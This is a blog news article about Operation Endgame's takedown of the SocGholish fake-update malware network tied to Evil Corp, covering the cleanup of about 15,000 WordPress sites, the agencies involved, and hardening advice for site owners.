ProBackend
law enforcement takedowns
1 hour ago8 min read

Operation Endgame: Law Enforcement Seizes Control of SocGholish Malware infrastructure From Nearly 15,000 WordPress Sites

A sweeping international operation dismantled the SocGholish malware distribution network, cleaning 14,971 compromised WordPress sites and disabling over 100 servers tied to Evil Corp—marking a pivotal moment in the multi-year Operation Endgame campaign against global cybercrime.

Riley Hawke

It didn’t make global headlines with fanfare—no raucous press conferences, no dramatic asset seizures broadcast live. But over the last few weeks, a quiet yet massive effort unfolded across borders and servers: international law enforcement quietly cleaned nearly 15,000 WordPress sites infected with SocGholish malware and took down more than 100 of the infrastructure pieces keeping it all afloat. This operation, known as Endgame, was just one episode in an ongoing war against the SocGholish botnet and its ties to Evil Corp, one of the most enduring cybercriminal organizations operating out of Russia for nearly two decades.

What makes this sweep so significant isn’t just the scale—though 14,971 infected sites is staggering—but how methodical and coordinated it was. This wasn’t a flash-and-bang operation against just one server cluster or botnet node; it targeted the entire infection chain, from distribution to payload delivery. And crucially, it didn’t just neutralize the threat; authorities also empowered site owners to secure their systems moving forward. The result? A rare moment where defenders didn’t just react—they took the initiative.

Who Was SocGholish, and Why Should You Care?

If you’ve ever seen one of those annoying pop-ups warning your browser is out-of-date and suggesting a suspicious download, you’ve bumped into SocGholish’s domain of influence.

SocGholish (also tracked as FakeUpdates or GhoLoader) is a JavaScript-based malware dropper that first surfaced around 2017. Unlike some flashy ransomware, SocGholish operates with subtlety: it hijacks legitimate websites—mostly WordPress deployments—and injects subtle JavaScript that redirects users to fake update prompts, often disguised as Chrome or Edge upgrades. Once a user clicks and installs that “update,” the malware establishes a beachhead on their device.

The real danger isn’t just that one fake update; it’s what happens next. SocGholish is a delivery mechanism for other attacks—ones with far more severe consequences. The malware opens the door to well-known threats like Dridex (a banking trojan), Doppelpaymer (ransomware), Koadic, Empire, Chtonic, and Azorult (a stealer specialized in stealing credentials). In many cases, once SocGholish sets up camp, attackers have time to map out the compromised environment before deploying additional payloads.

What’s chilling is how long SocGholish has been around. In cybersecurity terms, a tool running since 2017 without major disruption is a long time indeed. It points to a certain level of sophistication and adaptability, especially when tied to groups like Evil Corp.

Evil Corp: Still Around, Even After Sanctions and Bounties

Evil Corp isn’t a new name. It’s been on the radar of law enforcement and threat intelligence teams for well over a decade—since 2007, to be exact. Known for operating alongside (or under the umbrella of) infamous malware families like Zeus and Dridex, Evil Corp has been linked to a string of high-profile campaigns:

  • WastedLocker: A ransomware strain targeting enterprises and healthcare organizations.
  • Hades and Macaw Locker: Other ransomware offshoots with evolving capabilities.
  • Phoenix CryptoLocker: A variant that preyed on file encryption vulnerabilities in the mid-2010s.

The group has weathered U.S. sanctions, a $10 million FBI bounty on its leader (Mikhail Yevgenyevich Vasiliev), and ongoing global pressure—and yet it persists. SocGholish appears to be a newer vector in their playbook, likely chosen for its ability to operate at scale through compromised websites rather than relying solely on spear-phishing or brute-force tactics.

The link between Evil Corp and SocGholish isn’t just circumstantial. Intelligence gathered by Europol and other agencies over the course of Operation Endgame confirms a structural connection—Evil Corp wasn’t just using SocGholish; it was central to how they delivered payloads across thousands of victims.

Operation Endgame: A Multi-Year Campaign, One Battle at a Time

This week’s sweep is just the latest chapter in Operation Endgame, an initiative that has quietly taken aim at everything from ransomware servers to credential-stealing infrastructure. As far back as November 2025, Endgame assets were already taking down more than 1,000 servers tied to Rhadamanthys, VenomRAT, and Elysium—a sign that this wasn’t a one-off.

In fact, looking back at Endgame’s history shows just how broad its scope has been:

  • Ransomware infrastructure dismantled
  • Smokeloader botnet customers and servers seized
  • AVCheck site, a long-running scam operation masquerading as antivirus tools
  • A full fleet of malware families including DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, and SystemBC

Each takedown represents an opportunity to understand the threat better—not just where it lives, but how it communicates, what infrastructure it uses (CDNs? VPS providers?), and how often it overlaps with other operations. That intelligence, in turn, feeds back into future operations.

The Dutch National High Tech Crime Unit (NHCTU), Royal Canadian Mounted Police (RCMP), FBI, and German Federal Criminal Office (BKA) were the backbone of this week’s effort, with Europol and Eurojust providing coordination. That kind of cross-border alignment is no small feat; it speaks to the maturity and trust built up between agencies over years of collaboration.

How Authority Teams Actually Cleaned 14,971 Sites

Here’s the thing: you can’t manually clean 14,971 WordPress sites. That would require thousands of security professionals and months—if not years—of labor.

Instead, the takedown team relied on a mix of technical automation and smart post-cleanup recommendations:

  1. Malware removal at scale – Automated tooling removed SocGholish JavaScript injections from infected WordPress installations.
  2. Backdoor cleanup – In many cases, SocGholish had deployed persistent backdoors to ensure future access. These were purged from the sites’ file systems and databases.
  3. Advisor role for site owners – Crucially, law enforcement didn’t just clean the sites and walk away. They provided clear guidance:
    • Change all credentials (hosting, admin, database)
    • Enable multi-factor authentication everywhere possible
    • Delete unknown or dormant WordPress user accounts
    • Update core, plugins, and themes to the latest versions

This “cleanup plus hardening” approach is what makes this operation stand out from previous botnet takedowns. Too often, sites get cleaned only to be reinfected days or weeks later because the root cause—weak passwords, outdated plugins, unmonitored admin accounts—is never addressed.

Maikel Rollman of the Dutch NHCTU put it best: “With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage… and limits the spread of malware.”

He added a crucial note: “This marks the beginning of further action against SocGholish.”

In other words, this wasn’t the end. It was a demonstration that coordinated action can disrupt even well-entrenched threats—and an invitation to other defenders to join the effort.

What Website Owners Should Do Now

Even if your site wasn’t part of this week’s takedown (and odds are it wasn’t—these things rarely affect every compromised site at once), SocGholish’s tactics remain a real threat. The group behind it hasn’t vanished; they simply shifted infrastructure to stay under the radar.

If you run a WordPress site, here’s what to do right now:

  • Scan for unauthorized users – Look especially for admins added outside your usual team. SocGholish often leaves backdoor accounts.
  • Review plugin and theme logs – If you don’t have a logging strategy, start one. SocGholish updates often show up as sudden, unexplained plugin installations.
  • Audit your file structure – SocGholish typically adds small JavaScript files to the wp-content directory or hides code in otherwise benign-looking PHP files.
  • Rotate all passwords and API keys – Even if you think they’re secure, social engineering or credential stuffing attacks could have harvested them.
  • Enable MFA everywhere – Not just your WordPress admin—also hosting control panels, database access, and any third-party APIs.

There’s no silver bullet here. But following these steps dramatically raises the barrier for attackers looking to repurpose your site as part of SocGholish’s next wave.

What Comes Next for SocGholish and Operation Endgame?

The Dutch authorities’ statement that this “marks the beginning of further action” is deliberate. SocGholish has shown resilience—it adapted from initial takedowns, shifted infrastructure, and even evolved its infection chain to avoid detection. That kind of adaptability suggests there are still active variants out there.

Some security researchers expect a few possible trajectories:

  • A rebrand or split: SocGholish could evolve into multiple, slightly different variants to confuse defenders. This has happened before with Dridex and Emotet.
  • Increased use of social engineering: If law enforcement tightens technical defenses, expect more phishing lures, fake support calls, and misleading update prompts.
  • Tighter integration with ransomware groups: Given the clear overlap between SocGholish and Evil Corp, expect more targeted infections that lead directly to ransomware deployment.

The good news? This week’s takedown gives defenders a snapshot of SocGholish’s current infrastructure—names, IPs, domains, and even code patterns. That intelligence will feed into detection rules across firewalls, SIEMs, and endpoint tools for months to come.

Final Thoughts: A Small Win With Big Implications

This operation wasn’t flashy, and it didn’t make front-page news like some high-profile ransomware cases have. But in many ways, that’s exactly why it matters.

When you look at the numbers—14,971 sites cleaned, over 100 servers taken down—it represents something rare: defenders operating at scale and winning. Too often, cybercrime stories end with a system compromised, data leaked, or ransoms paid. This time, the outcome was different: sites restored, infections neutralized, and a clear message sent to operators of SocGholish and Evil Corp.

This kind of coordinated response—cross-border, multi-agency, and technically driven—is what the cybersecurity world needs more of. It shows that when defenders act in concert, even long-running operations like SocGholish can be disrupted.

And if Maikel Rollman is right—and this truly is just the beginning—then Operation Endgame has only just started to reveal its potential.

A Quiet Sweep, a Massive Impact

More engineering analysis and backend guidance from ProBackend.
More blogs